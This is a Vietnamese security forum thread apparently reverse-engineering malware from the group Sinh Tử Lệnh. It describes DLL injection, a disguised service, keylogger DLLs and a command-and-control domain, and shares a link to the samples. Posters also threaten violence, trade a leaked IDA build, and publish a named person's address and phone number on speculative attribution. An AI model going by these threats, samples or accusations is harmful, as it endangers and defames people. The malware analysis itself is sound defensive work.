Named: 5 chữ. Nanned: 6 chữ. Tui nghĩ không thể là named được đâu. Vì khi create pipe, coder thường đặt tên pipe có nghĩa với riêng mình hoặc unique name (theo GUIID chẵng hạn). Tuị coder STL này dùng chung 1 vài lib, các lib này lại có build option không thống nhất, khi thì có /GS, khi thì không. Rồi nội cái vụ remote inject code, remote load dll, tụi này lại dùng lung tung hàm, mà cái nào cuối cùng cũng đi tới La mã cả, phải không anh em STL ? Mai mốt rút kinh nghiệm, viết code optimize một chút nhé, exe, dll nhỏ hơn, em RCE cũng đỡ cực, chứ giờ em chả biết đặt tên proc ra sao nữa: InjectCode, RemoteInjectCode, RemoteNtLoadLibrary, RemoteNtCreateThreadEx... Lung tung cả, em quáng gà luôn, mà duyệt lên duyệt xuống thì code cứ na ná nhau, làm nhiệm vụ như nhau, bực quá, muốn xoá hết cho rồi. Em nói mấy anh em STL không tin, review lại code ipripv6.dll đi thì biết em nói đúng hay sai nhé ? Vd như hàm này, có thể em đặt tên hàm sai, nhưng mà công nhận mấy anh rãnh ghê ha: Code:

// Create global pipe name: \\\\.\\pipe\\NannedPipe
// VA: 10001000, file ipripv6.dll
wchar_t* _cdecl CreatePipeName()
{
  void *pMem;

  pMem = malloc(100);
  g_wszPipeName = pMem;
  if ( pMem )
  {
      memset(pMem, 0, 0x64u);
      wstrcpy(g_wszPipeName, L"\\\\.\\pipe\\NannedPipe");
  }
  return &g_wszPipeName;
}

Sao không khai báo constant: g_wszPipeName = L"\\\\.\\pipe\\NannedPipe"; mẹ cho rồi. Bởi vậy em mới nói em mà review code mấy anh thì mấy anh tiêu, bắt viết lại hết nhé. Còn không thì mai mốt gởi cho em cái lib remote inject code, remote load library, mấy cái hàm decode vớ vẫn đấy (vd như hàm dùng string Microsoft xxxx gì đó) cho em để em review, optimize lại cho nhé. Chứ em RCE code tụi anh tới giờ em ngán tới tận cổ rồi, code duplicate, copy & paste lung tung hết. Bỏ giữa chừng thì anh em HVA buồn, mà viết tiếp thì em ngán quá. Hay là mai mốt tìm đâu được code rootkit đỉnh một chút thì gởi em nhé. PS: Lúc trước em có gặp thằng GoogleCrashHandler.exe mà theo CMC thì là bot vào VietNamNet, so ra thì code C++của thằng GoogleCrashHandler này cao thủ hơn code của anh em STL này nhiều. Tìm thằng đó mà học hỏi đi nhé !

RCE đám virus của Sinh Tử Lệnh.

tranvanminh — GMT

Khoe một chút: Thấy font và color của OllyDbg em đang dùng đẹp không. Font: Raize, color: Alex Black.

Đọc mà chỉ buồn cưới =))

RCE đám virus của Sinh Tử Lệnh.

hoanganhloc — GMT

TQN wrote:

Gởi tụi STL: 1. Tụi mày lớn hơn tao không mà xưng anh với tao ? 2. Tụi mày chơi trò quá bẩn, núp trong bóng tối, chơi trò ăn cắp pass bao nhiêu lâu rồi mà không thấy xấu hổ à. 3. Tụi mày tưởng hù doạ được tao à. Tao chỉ cần biết một thằng ngoài đời của tụi bây là thằng đó mất xác, khỏi đi tìm. 4. Mấy cái pass cho mấy cái forum, mail vớ vẫn ấy, tao PM cho tui bây cũng được, mất cái này tao tạo cái khác, tên tuổi của tao TQN thì dưới bất cứ nick gì vẫn là TQN. 5. Tui mày chơi bẩn, đợi tao đi xa mới dám tấn công à ? 6. Tui mày tưởng vào được cái xxxbank của tao là giỏi à ? Tụi mày vào đó chỉ xem được chi tiết giao dịch rút, chuyển tiền của tao chứ làm chó gì được. Muốn rút tiền của tao à ? Còn lâu, chữ ký, đt, CMND của tao không có thì đố tụi mày rút tiền được. Vậy mà còn nói dóc, vào rồi ra, để đức cho con cháu. Một ngày làm của tao bằng 10 tháng lương của 10 thằng làm ăn lương hèn hạ của tụi mày. Tao sẽ theo vụ này tới cùng, đừng để thằng nào gặp tao ngoài đường nhé, đệ của tao xả chết ráng chịu nhe. Thách cho tụi mày có chính quyền chống lưng, chơi trò rootkit, snip packet của tao ? PS: À quên, mạng của một thằng trong tụi mày cao lắm là 30 chai thôi, nhớ nhé !

Hơi sức đâu mà ông anh nóng giận với mấy chuyện cỏn con đó làm gì? Em thì xài cái Token Key cho nên mất user và pass của ngân hàng cũng ko thành vấn đề gì. Cái PC của em thì toàn là thông tin vớ vẩn, thêm cái firewall và cái microsoft essential nên em cũng quan tâm lắm tới mấy cái trò vớ vẩn của bọn nhóc STL. PS: Anh TQN upload ại cho em mấy cái file đó dc ko? Lâu lắm rồi ko tò mò mấy vụ này.. có lẽ em chậm tay hay sao mà MediaFire nó xoá hết rồi...

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Lúc trước, sau khi tụi STL lấy được pass mail của tui, tụi nó vào Mediafire xoá hết. Sau khi tui lấy lại pass mail, tui đã up lại. Cậu vào đây download: http://www.mediafire.com/?tz745o0f678w8 2 tranvanminh: anh viết toàn bộ buồn cười hay anh khoe nó buồn cười.

RCE đám virus của Sinh Tử Lệnh.

chube — GMT

- anh dẫn chuyện hay lắm, em rất thích, và quan trọng là cách anh lồng yếu tố hài hước trong cách anh dẫn chuyện với mấy từ biểu lộ sự khôi hài như "tụi STL" , "Với tool này, STL có giấu file ở đâu đều tìm ra chưa tới nữa giây. "(trích Mỗi tuần 1 tiện ích) mỗi lần đọc em chỉ ôm bụng cười thôi hihi.

RCE đám virus của Sinh Tử Lệnh.

conmale — GMT

TQN wrote:

Lúc trước, sau khi tụi STL lấy được pass mail của tui, tụi nó vào Mediafire xoá hết. Sau khi tui lấy lại pass mail, tui đã up lại. Cậu vào đây download: http://www.mediafire.com/?tz745o0f678w8 2 tranvanminh: anh viết toàn bộ buồn cười hay anh khoe nó buồn cười.

Hì hì, ý tranvanminh (theo anh hiểu) là những bài phân tích của em rất căng thẳng nhưng cũng có những chi tiết rất hài đó thôi chớ chẳng phải bài viết của em buồn cười đâu. @maclaren: bài viết của Xuân Nhi gì đó tràn lan trên mạng nhưng có quá nhiều chi tiết không chính xác. Bài của Xuân Nhi mới nhìn thì giống như đang phê bình STL nhưng thật sự lại là bao che và bào chữa cho STL. Nói tóm lại, đừng phí thời gian "buôn" những chuyện ngồi lê đôi mách trên mạng bởi vì chẳng có gì bảo đảm tính trung thực của nó cả. Tất cả hầu như là nặc danh cho nên muốn nói cái gì lại không được. PS: lần sau đừng nhét những bài "xã hội" vô trong những chủ đề phân tích kỹ thuật nha bồ. Tái phạm tôi khoá account đó.

RCE đám virus của Sinh Tử Lệnh.

maclaren — GMT

conmale wrote:

TQN wrote:

Lúc trước, sau khi tụi STL lấy được pass mail của tui, tụi nó vào Mediafire xoá hết. Sau khi tui lấy lại pass mail, tui đã up lại. Cậu vào đây download: http://www.mediafire.com/?tz745o0f678w8 2 tranvanminh: anh viết toàn bộ buồn cười hay anh khoe nó buồn cười.
Hì hì, ý tranvanminh (theo anh hiểu) là những bài phân tích của em rất căng thẳng nhưng cũng có những chi tiết rất hài đó thôi chớ chẳng phải bài viết của em buồn cười đâu. @maclaren: bài viết của Xuân Nhi gì đó tràn lan trên mạng nhưng có quá nhiều chi tiết không chính xác. Bài của Xuân Nhi mới nhìn thì giống như đang phê bình STL nhưng thật sự lại là bao che và bào chữa cho STL. Nói tóm lại, đừng phí thời gian "buôn" những chuyện ngồi lê đôi mách trên mạng bởi vì chẳng có gì bảo đảm tính trung thực của nó cả. Tất cả hầu như là nặc danh cho nên muốn nói cái gì lại không được. PS: lần sau đừng nhét những bài "xã hội" vô trong những chủ đề phân tích kỹ thuật nha bồ. Tái phạm tôi khoá account đó.

à không ! tại vụ STL này mình không biết ? thấy 1 số thông tin hơi củ trên mạng ! mà lại thấy các bác HVA nhà mình đang khuấy nó lên nên cũng tò mò ! định đưa thông tin đó các bác xem thôi ! chứ không có ý gì cả ? - cho mình hỏi ! theo thông tin trên mạng thì nó lâu rồi. hay giờ STL tái xuất mà các bác lại khuấy ra thế ? mình hơi tò mò thôi :D

RCE đám virus của Sinh Tử Lệnh.

conmale — GMT

maclaren wrote:

conmale wrote:

TQN wrote:

Lúc trước, sau khi tụi STL lấy được pass mail của tui, tụi nó vào Mediafire xoá hết. Sau khi tui lấy lại pass mail, tui đã up lại. Cậu vào đây download: http://www.mediafire.com/?tz745o0f678w8 2 tranvanminh: anh viết toàn bộ buồn cười hay anh khoe nó buồn cười.
Hì hì, ý tranvanminh (theo anh hiểu) là những bài phân tích của em rất căng thẳng nhưng cũng có những chi tiết rất hài đó thôi chớ chẳng phải bài viết của em buồn cười đâu. @maclaren: bài viết của Xuân Nhi gì đó tràn lan trên mạng nhưng có quá nhiều chi tiết không chính xác. Bài của Xuân Nhi mới nhìn thì giống như đang phê bình STL nhưng thật sự lại là bao che và bào chữa cho STL. Nói tóm lại, đừng phí thời gian "buôn" những chuyện ngồi lê đôi mách trên mạng bởi vì chẳng có gì bảo đảm tính trung thực của nó cả. Tất cả hầu như là nặc danh cho nên muốn nói cái gì lại không được. PS: lần sau đừng nhét những bài "xã hội" vô trong những chủ đề phân tích kỹ thuật nha bồ. Tái phạm tôi khoá account đó.
à không ! tại vụ STL này mình không biết ? thấy 1 số thông tin hơi củ trên mạng ! mà lại thấy các bác HAV nhà mình đang khuấy nó lên nên cũng tò mò ! định đưa thông tin đó các bác xem thôi ! chứ không có ý gì cả ? - cho mình hỏi ! theo thông tin trên mạng thì nó lâu rồi. hay giờ STL tái xuất mà các bác lại khuấy ra thế ? mình hơi tò mò thôi :D

Lạ thật. Bồ là thành viên từ 2008 nhưng vẫn HVA thành HAV là sao cà? STL chưa bao giờ ngưng hoạt động cho nên không thể "tái xuất".

RCE đám virus của Sinh Tử Lệnh.

tranvanminh — GMT

2 tranvanminh: anh viết toàn bộ buồn cười hay anh khoe nó buồn cười.

Dạ, là như anh conmale trình bày, thấy vui với cách hành văn của anh thôi, chứ không phải nói nội dung kỹ thuật của anh buồn cười (mà thật ra là em hoàn toàn không hiểu về kỹ thuật anh viết ) . Thân mến.

RCE đám virus của Sinh Tử Lệnh.

maclaren — GMT

xin lỗi bác conmale và mọi người ! em edit lại rồi ! hì HVA em cứ hay thuận tay là ....tai kỹ thuật typinng của em được có 6 ngón nên :D

RCE đám virus của Sinh Tử Lệnh.

thaovn — GMT

http://www.domaintools.com/research/whois-history/?q=SMARTSHOW.INFO&page=results&submit=Look+up Các lần change whois info của nó , anh em nào có thẻ tín dụng thì mua cai pro account check giùm sẽ ra chi tiết ! :D 2007 2007-11-05 2008 2008-04-14 2008-04-27 2010 2010-04-23 2010-06-21 2010-08-10 2010-08-15 2010-10-08 2010-11-30 2011 2011-01-22 2011-03-18 2011-04-20 2011-04-24 2011-05-04 2011-05-20 2011-05-23 2011-05-28 2011-05-29 2011-05-30 2011-05-31

RCE đám virus của Sinh Tử Lệnh.

PXMMRF — GMT

thaovn wrote:

http://www.domaintools.com/research/whois-history/?q=SMARTSHOW.INFO&page=results&submit=Look+up Các lần change whois info của nó , anh em nào có thẻ tín dụng thì mua cai pro account check giùm sẽ ra chi tiết ! :D 2007 2007-11-05 2008 2008-04-14 2008-04-27 ............. 2010-04-23 2010-11-30 2011 2011-01-22 2011-03-18 2011-04-20 ......... 2011-05-31

Mua thế nào được cái Pro account. Giá là 10 USD cho 01(một) ngày và chỉ được xem 01(một) domain (whois history) mà thôi. Hì hì To TQN: anh sẽ post lên các thông tin về SMARTSHOW. INFO ( IP, webserver, Location...). Đã có thông tin từ lâu nhưng bận quá (bận cái vụ Hacker VN vs Hacker Tầu) nên chưa post lên được. Sorry

RCE đám virus của Sinh Tử Lệnh.

PXMMRF — GMT

THÔNG TIN VỀ DOMAIN SMARTSHOW.INFO VÀ WEBSERVER HOSTING WEBSITE SMARTSHOW.INFO Như các bạn đã biết, anh TQN sau khi disassembling các malicious file của nhóm STL đã phát hiện ra trojan nhúng trong các file này có một service sử dụng để mở một Internet socket kết nối đến một website có tên miền là smartshow.info. Website đóng vai trò tiếp nhận các thông tin mà trojan lấy cắp từ máy nạn nhân, cũng như gửi đến trojan các lệnh (command) mới. Khi anh TQN phát hiện ra smartshow.info thì website này đã không còn active (hiện diện) trên mạng, cho đến nay. Do vậy không thể biết được trước đó website này được hosting trên webserver nào và đặt ở đâu. Tuy nhiên bằng một vài kỹ thuật riêng, kèm với đôi chút kinh nghiêm, chúng tôi đã tìm ra IP của webserver trước đó đã hosting website smartshow.info của nhóm STL, cũng như vị trí đặt webserver này. (Thông tin về webserver chúng tôi tìm ra khoảng nửa ngày sau bài viết công bố tìm thấy tên domain smartshow.info của anh TQN, nhưng giờ mới tiện đăng) A- Trước hết cập nhật thông tin mới của domain smartshow.info Ngày hôm nay 17-6-2011 whois information của domain như sau:

Domain ID:D32531112-LRMS Domain Name:SMARTSHOW.INFO Created On:22-Apr-2010 11:06:53 UTC Last Updated On:02-Jun-2011 03:00:28 UTC Expiration Date:22-Apr-2012 11:06:53 UTC Sponsoring Registrar:OnlineNIC, Inc. (R170-LRMS) Status:CLIENT HOLD Status:CLIENT TRANSFER PROHIBITED Status:PENDING DELETE RESTORABLE Status:HOLD Registrant ID:OLNI_196680_0_0 Registrant Name:Domain ID Shield Service Registrant Organization:Domain ID Shield Service CO., Limited Registrant Street1:1102-1103,11/F,Kowloon Bldg.,555 Nathan Rd.,Mongkok,Kowloon Registrant Street2: Registrant Street3: Registrant City:Hong Kong Registrant State/Province:Hong Kong Registrant Postal Code:999077 Registrant Country:CN

Những điểm chú ý trong information: 1- Địa chỉ người đăng ký domain là ở Kowloon, Hong công. Ở Hồng công có hai khu là khu Hồng công và Kowloon, như trước đây TP HCM có hai khu là Sài gòn và Chợ lớn. Khu Hong công là trung tâm thương mại, hiện đại, còn Kowloon thì cách Hong công một eo biển, là khu kém phát trển hơn, chủ yếu là sản xuất nhỏ, nông nghiệp và sát với Trung hoa lục địa 2- Domain này mua dịch vụ bảo vệ thông tin, nên một số thông tin trên whois đươc giấu, thí dụ địa chỉ email của người sở hữu domain. 3- Điểm quan trong nhất là domain này dù chưa hết hạn nhưng đang bị registrar đưa vào trang thái: PENDING DELETE RESTORABLE Trang thái (status) này được hiểu là: không đươc cập nhật, thay đổi (update) thông tin của domain trong thời gian tới, ít nhật là trong 40 ngày tới. Sau đó registrar sẽ tiếp tục giữ domain ở trang thai này thêm 30 ngày (và rồi có thể bán lại cho người khác...) B- Webserver đã từng hosting website smartshow.info Webserver này có IP tĩnh là 173.45.73.121, computer name (host name) là 79.49.2d.static.xlhost.com. Công ty xlhost.com quản lý webserver này IP tĩnh nói trên do công ty sau đây quản lý và địa chỉ của nó:

OrgName: eNET Inc. (Tên công ty) Address: 3000 East Dublin Granville Rd. City: Columbus StateProv: OH PostalCode: 43231 Country: US

Địa chỉ trên đây (Columbus, OH. USA) cũng chính là địa chỉ địa lý đặt webserver đã từng hosting website smartshow.info của nhóm STL (Còn tiếp)

RCE đám virus của Sinh Tử Lệnh.

chube — GMT

- http://www.malwareurl.com/listing.php?domain=ademuwmaytn.com - http://ratite.com/whois/whois.cgi?domain=kardjalinews.com - http://whois.domaintools.com/dochoigiare.com Anh PXM nghĩ sao về những kết quả này ? còn nhiều link em bắt gặp từ Postal Code đến Address Street y hệt - Hôm nay em đọc bài này ở đây : http://www.giaoduc.edu.vn/news/tien-ich-743/hon-200.000-website-mat-tai-khoan-quan-tri-108811.aspx Đề cập đến NeoSploit Toolkit và Trojan Sinowal , liệu đây có phải là hình thức tấn công mà STL dùng ? Em đợi bài tiếp của anh hihi.

RCE đám virus của Sinh Tử Lệnh.

conmale — GMT

Từ tháng 4 năm 2008 đến 2010, smartshow.info được georgiy-fedo@yandex.ru đăng ký và sử dụng. Từ 23 tháng 4 năm 2010, được một (người Hoa =)) ) có tên là Zhong Guo Jun đăng ký sử dụng. Search "Zhong Guo Jun" ra khối thứ lý thú ;). Với domain status: PENDING DELETE RESTORABLE thường là domain không renew cho nên bị "delete". Tuy nhiên, chuyện lý thú là domain smartshow.info này được update lần cuối là ngày 2 tháng 6 2011 và domain còn hiệu lực (đã trả tiền) đến 22 tháng 4 năm 2012 lận. Vậy "Status: PENDING DELETE RESTORABLE" là điều bí ẩn :). Tìm hiểu thêm thì registrar OnlineNIC, Inc là một registrar đã từng bị toà án Mỹ đưa ra toà phạt vạ rất nặng -1- và cũng là registrar bị than phiền nhiều nhất từ trước đến giờ. Registrar này hiện đang bị ICANN soi. Có ai còn nhớ vụ registrar registerfly.com không vậy? registerfly.com từng là một registrar rẻ tiền nhất và nổi tiếng nhất nhưng cũng không kém phần... bựa cho nên bị ICANN lột lon và sau một thời gian dãy giụa, registrar này biến mất. -1- OnlineNIC bị phạt 33 triệu đô la vị tội "Cybersquatting" năm 2010. Hiện nay có hàng ngàn người đang phàn nàn OnlineNIC, trong đó có những lawsuits khá lớn.

RCE đám virus của Sinh Tử Lệnh.

mv1098 — GMT

TQN wrote:

NannedPipe, Nanned: các bạn có biết nghĩa hay phát âm của ngôn ngữ nào có từ Nanned này không ? Em google hết thì chỉ thấy Google khuyên từ này: Nanning (Nam Ninh - Tàu khựa).

http://xml.ssdsandbox.net/view/6e24fe89052848420714b947fa890225 Đây là thông tin về 1 con malware mình thấy có những điểm tương tự như con malware trong phân tích của TQN, post lên đây cho mọi người tham khảo

TQN wrote:

À quên, em vẫn có nhu cầu IDA 6.x nhé, bà con nào có share cho em đi. 10 chầu nhậu, em út luôn. PS: Hi rongchaua, lâu quá không gặp. Thấy em vào xem topic này anh vui lắm. Anh em REA. Vào giúp anh một tay đi. Khi nào tụi STL này code malware = .NET thì dành hết cho em nhé !

Mình đã gửi cho bro bản DIA 6.1 Pro qua hòm thư xxxxx66[@]hotmail.com rồi đó. PS : nhớ quét virus trước khi sử dụng nhé bro

RCE đám virus của Sinh Tử Lệnh.

mv1098 — GMT

conmale wrote:

Từ tháng 4 năm 2008 đến 2010, smartshow.info được georgiy-fedo@yandex.ru đăng ký và sử dụng. Từ 23 tháng 4 năm 2010, được một (người Hoa =)) ) có tên là Zhong Guo Jun đăng ký sử dụng. Search "Zhong Guo Jun" ra khối thứ lý thú ;). Với domain status: PENDING DELETE RESTORABLE thường là domain không renew cho nên bị "delete". Tuy nhiên, chuyện lý thú là domain smartshow.info này được update lần cuối là ngày 2 tháng 6 2011 và domain còn hiệu lực (đã trả tiền) đến 22 tháng 4 năm 2012 lận. Vậy "Status: PENDING DELETE RESTORABLE" là điều bí ẩn :).

Tổng hợp thông tin về Zhong Guo Jun như sau: Làm việc tại VNVN System Inc ( có thể là người sáng lập ) Địa chỉ: 14902 Moran Street Westminster, CA 92683 US Phone: 714-726-9966 Đây là 1 công ty chuyên về thiết kế web cho cộng đồng người Việt tại US Website chính là vnvn.net Các website liên quan: trungtam.com, vietherald.com, vnvn.net, vncyber.com ( cái này không biết có liên quan đến cái project cybergame trong phân tích của TQN không ) @anh conmale: Trong trường hợp của domain smartshow.info, domain status đầy đủ thì có mấy trường hợp sau : CLIENT HOLD, CLIENT TRANSFER PROHIBITED, HOLD, PENDING DELETE RESTORABLE nên chưa chắc nó đã là PENDING DELETE RESTORABLE

RCE đám virus của Sinh Tử Lệnh.

conmale — GMT

mv1098 wrote:

conmale wrote:

Từ tháng 4 năm 2008 đến 2010, smartshow.info được georgiy-fedo@yandex.ru đăng ký và sử dụng. Từ 23 tháng 4 năm 2010, được một (người Hoa =)) ) có tên là Zhong Guo Jun đăng ký sử dụng. Search "Zhong Guo Jun" ra khối thứ lý thú ;). Với domain status: PENDING DELETE RESTORABLE thường là domain không renew cho nên bị "delete". Tuy nhiên, chuyện lý thú là domain smartshow.info này được update lần cuối là ngày 2 tháng 6 2011 và domain còn hiệu lực (đã trả tiền) đến 22 tháng 4 năm 2012 lận. Vậy "Status: PENDING DELETE RESTORABLE" là điều bí ẩn :).
Tổng hợp thông tin về Zhong Guo Jun như sau: Làm việc tại VNVN System Inc ( có thể là người sáng lập ) Địa chỉ: 14902 Moran Street Westminster, CA 92683 US Phone: 714-726-9966 Đây là 1 công ty chuyên về thiết kế web cho cộng đồng người Việt tại US Website chính là vnvn.net Các website liên quan: trungtam.com, vietherald.com, vnvn.net, vncyber.com ( cái này không biết có liên quan đến cái project cybergame trong phân tích của TQN không ) @anh conmale: Trong trường hợp của domain smartshow.info, domain status đầy đủ thì có mấy trường hợp sau : CLIENT HOLD, CLIENT TRANSFER PROHIBITED, HOLD, PENDING DELETE RESTORABLE nên chưa chắc nó đã là PENDING DELETE RESTORABLE

Hì hì, Thử tìm hiểu các domain names ở trên nằm ở đâu và tại sao vietherald.com lại nằm bên tận onlinenic.com của CN? Địa chỉ của vnvn.net thì ở Westminter, CA nhưng tại sao địa chỉ của "Zhong Guo Jun" lại ở Kirkland tận tiểu bang WA? ;). Đó là chưa kể những chi tiết nằm trong địa chỉ và số điện thoại ;).

RCE đám virus của Sinh Tử Lệnh.

mv1098 — GMT

conmale wrote:

Địa chỉ của vnvn.net thì ở Westminter, CA nhưng tại sao địa chỉ của "Zhong Guo Jun" lại ở Kirkland tận tiểu bang WA? ;). Đó là chưa kể những chi tiết nằm trong địa chỉ và số điện thoại ;).

Việc người có địa chỉ ở tiểu bang A sang tiểu bang B sống và làm việc là chuyện bình thường ở US nên việc này cũng không là vấn đề. Vấn đề theo em nghĩ địa chỉ ở WA là giả, em có sử dụng gmap với usps mà không tim ra địa chỉ cá nhân đó. Việc bịa ra info khi đăng ký domain là điều rất đơn giản, registrar chỉ quan tâm cái credit card của khách hàng pay đều là được Em có đăng ký hosting và domain tại GoDaddy mà chẳng thấy nó gửi cái billing nào về nhà cả.

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Cảm ơn mv1098. Bản IDA 6.1 mà bạn mail cho tui tui đã có rồi. Đó là bản leak của Gu Tian Ren, Cai. Cha này là tàu khựa. Bản leak này được đưa lên đầu tiên ở ExeTools forum. Tui là VIP ở đó mà, có ngay. Nhưng bản IDA 6.1 leak này thiếu rất nhiều file như: ida.key, idag.exe, idag64.exe, idaq64.exe. Và nói luôn là một loạt các plugin phổ biến đang dùng cho IDA 5.5 leak lúc trước sẽ không run hay làm idaq.exe dump, vd: DarunGrim, TurboDiff, PatchDiff, IDAStealth, color_loop, x86emu... Em phải bỏ mấy ngày ra build hay patch các plugin trên. Quay lại tiếp về đám malware này, thời gian gần đây em không còn hứng thú với việc RCE đám "meo què" này nữa, cũng lu bu nhiều chuyện khác, nên topic đã dừng hơi lâu. Tối qua nhậu quắc cần câu, giờ mệt quá, ở nhà, mở ipripv6.idb với IDA 61, switch debugger qua Local Bochs debugger, PE mode, decode một loạt các string của nó. Quá đã, chỉ cần Set IP ở các địa chỉ call hàm Decode, trace mấy phát, lòi ra hết. Bochs chạy êm ru, không trục trặc gì cả.

Decode xong mới phát hiện STL còn dùng một keylog dll khác, xem trong hình các bạn sẽ thấy: CDRWapi.dll. Nếu ipripv6.dll detect có hardkdb.dll trong Windows\ime directory thì load nó, còn không thì load %AppData%\Microsoft\Windows Media\CDRWapi.dll. File này máy em không có, bà con ai có share em với. Hay là STL chưa release ? Thôi, mấy anh STL có nó thì gởi vào hộp mail Google hay Yahoo của em một bản với ;)

RCE đám virus của Sinh Tử Lệnh.

PXMMRF — GMT

TQN wrote:

Tối qua nhậu quắc cần câu, giờ mệt quá, ở nhà, mở ipripv6.idb với IDA 61, switch debugger qua Local Bochs debugger, PE mode, decode một loạt các string của nó. Quá đã, chỉ cần Set IP ở các địa chỉ call hàm Decode, trace mấy phát, lòi ra hết. Bochs chạy êm ru, không trục trặc gì cả.

Decode xong mới phát hiện STL còn dùng một keylog dll khác, xem trong hình các bạn sẽ thấy: CDRWapi.dll. Nếu ipripv6.dll detect có hardkdb.dll trong Windows\ime directory thì load nó, còn không thì load %AppData%\Microsoft\Windows Media\CDRWapi.dll. File này máy em không có, bà con ai có share em với. Hay là STL chưa release ? Thôi, mấy anh STL có nó thì gởi vào hộp mail Google hay Yahoo của em một bản với ;)

1- TQN kiểm tra kỹ lại xem khi decode LoadWbmainDLL+2C9 thì nó ra một service nằm trong system32 là "svchost.exe" (System32/svchost.exe) hay là svchost.exe -k netsves Vì svchost.exe là một service gốc trong Windows, nó chuyên dùng cho một số dịch vụ quan trong của chính Windows Xin tham khảo lại bài viết liên quan của mình tại trang 2 của chính topic này:

Theo tôi, nếu gặp những khó khăn như trên, có thể nghĩ đến một cách tiếp cận khác. (sau đó có thể quay lai cách tiếp cận cũ) Các file .dll (hardkbd.dll- keylogger và wbmain.dll-downloader) mà chúng ta đang disassembling có những mối liên hệ với một service quan trong mà Trojan thiết lập mới trong hệ thống, có nhiệm vụ tạo socket kết nối Internet với máy chủ -website của hacker, để chuyển thông tin lấy cắp và nhận lệnh (thí dụ website smartshow.info) Service này, trong các malicious tool (ware) của STL hay của các Chinese hacker khác thường là "iprip", tiến trình của nó là svchost.exe -k netsves (chú ý phân biệt với svchost.exe gốc của Windows-local service) Vì bận quá, nên tôi chưa có thời gian phân tích kỹ 2 file dll nói trên và cho chay file virus.doc trên máy thật. Vả lại có phân tích thì cũng không bằng TQN được. Tuy nhiên đã socket spying sơ qua file tiến trình svchost.exe -k netsves nói trên

2- Ngoài ở đây "Set IP" thì IP là IP gì theo ý TQN?

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Không có gì đâu anh, svchost.exe là Service Host Control Process. Nó quản lý việc khởi tạo, run, stop... tất cả các service trong Windows. ipripv6.dll đăng ký nó như một service DLL, run trong process memory space của svchost.exe Service Name: Iprip Service cmdline: %SystemRoot%\System32\svchost.exe -k netsvcs ServiceDLL: path của chính nó, ipripv6.dll DisplayName: RIP Listener Description: Provides automatic configuration for the 802.11 adapters Code khởi tạo service này nằm ở hàm export DllCanUnloadNowA, VA = 10001860. Còn hàm LoadWbmainDLL ở trên thì nó chỉ làm việc CreateProcess svchost.exe rồi dùng kỹ thuật remote load library: CreateRemoveThread, VirtualAllocEx và LoadLibrary để load wbmain.dll vào svchost.exe. Set IP tức là set current IP: Intruction Pointer đấy anh !

RCE đám virus của Sinh Tử Lệnh.

PXMMRF — GMT

TQN wrote:

Không có gì đâu anh, svchost.exe là Service Host Control Process. Nó quản lý việc khởi tạo, run, stop... tất cả các service trong Windows. ipripv6.dll đăng ký nó như một service DLL, run trong process memory space của svchost.exe Service Name: Iprip Service cmdline: %SystemRoot%\System32\svchost.exe -k netsvcs ServiceDLL: path của chính nó, ipripv6.dll ......................

OK! Thanks TQN và các bạn tham khảo bản phân tích này. Tôi ghi chú các bình luận của mình từ 31-5-2011, định post lên để các bạn tham khảo thêm cho vui, nhưng vì bận thảo luận cái việc Hacker VN vs Hacker Tầu từ ngày 1-6-2011 cho đến nay nên quên khuấy. Nay xin post lại

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Cảm ơn anh PXMMRF. Các hình của anh đúng là các hành vi của ipripv6.dll bị caputre trong môi trường sandbox. Nhưng nó lại bỏ sót thằng quan trọng nhất trong đám "meo què" này: dao360.dll.mui. Thằng này chính là thằng nòng cốt, code dài nhất, lớn nhất, connect tới host chủ của STL để up msdata.vxd về đấy. Và hầu hết các online sandbox đều thiếu netword traffic capture. Đây chính là yếu tố quan trọng trong topic: RCE đám "meo què" của tụi STL này. Em xin chắc chắn một câu, nhóm STL này gồm rất nhiều coder, tối thiểu là hai hay ba. Một coder bình thường phải code cật lực mới sinh ra được một đống "mèo que" như vậy. Khi RCE, em thấy coding style của tuị này rất lộn xộn, thằng thì chuyên xài Win32 API như File API, WinHTTP api, thằng khác thì lại chuyên dùng pure C, fclose, fread, fwrite, socket API pure, lại có thằng thì không không lại phang C++ với STL (Standard Template Library) vào. Anh em không tin thì cứ kiểm tra hai file ipripv6.dll và dao360.dll.mui. Low address thì dùng Win32 API, high address thì lại pure C. Higher address thì của C/C++ RTL (cái này không bàn). Còn một điều nữa, code của nhóm này duplicate rất nhiều, vô số kể. Em RCE mà phải bực cái mình. Mạnh thằng nào nấy code. Trong cùng 1 file DLL, có tới 2 hay 3 hàm cùng làm một công việc đó. Đứng theo phương diện coder như em, em biết, thằng xếp phân xuống, file dll này phải làm cái này cái kia. Một file dll thì có 2 hay 3 thằng viết trên nhiều file .c/.cpp khác nhau. Sau đó đem vào project, ráp và compile luôn, không review lại duplicate code. Em nói đúng không mấy anh STL. Hay là em phải nói thẵng là "bad code". À mà quan trọng gì ha ? Ăn cắp mà, cần gì tốt, cần gì tinh vi, miễn là lấy được pass mail, blog của victim là được rồi ha ?! Và thêm một điều nữa, đám "mèo què" này dùng rất nhiều kỹ thuật phải nói là thuộc loại cao cấp, undocument trong giới viết malware. Từ từ em sẽ post sau. Nhưng lạ một cái là là thỉnh thoảng em gặp những lỗi rất là ngớ ngẫn trong lập trình của tụi STL này. Không lý là tụi này copy code ở đâu đó hay dùng lib của ai đó cung cấp cho. Em nói mấy anh STL không tin, em chỉ cho các anh nhé, vd nhỏ nhé, 1 vd nhỏ thôi, như các anh dùng Memory Mapping File API để map một file với read/write mode. Sau đó các anh lại operator new một memory buffer mới với size = GetFileSize của file config của mấy anh. Rồi mấy anh đi xor từng byte content trong memory allocated đó. Sau đó mấy anh lại memcpy vùng nhớ đã xor vào mapping memory. Code của ipirpv6.dll đấy. Mấy anh thấy có dư không, có ngớ ngẫn không ? Đã mapping file với write mode thì xor mẹ trên memory đó cho rồi, phải không mấy anh, còn bày vẽ cấp phát memory, copy, xor, rồi copy lại. Bởi vậy em mới nói, em mà làm review code của mấy anh thì mấy anh mệt với em rồi. Còn một điều nữa, giờ em mới nhớ, năm 2010, trước khi bệnh dịch hạch STL bùng phát, trên các forum chuyên về virus, lập trình của VN ta, lại thấy các topic post tuyển dụng lập trình viên nghiên cứu, phát triển "meo què". Tới khoãng tháng 10, 11 thì chấm dứt. Các bạn tự Gú gồ sẽ thấy và thử suy nghĩ giùm em thử ???? Vd: virusvn, congdongcviet, fpt...

RCE đám virus của Sinh Tử Lệnh.

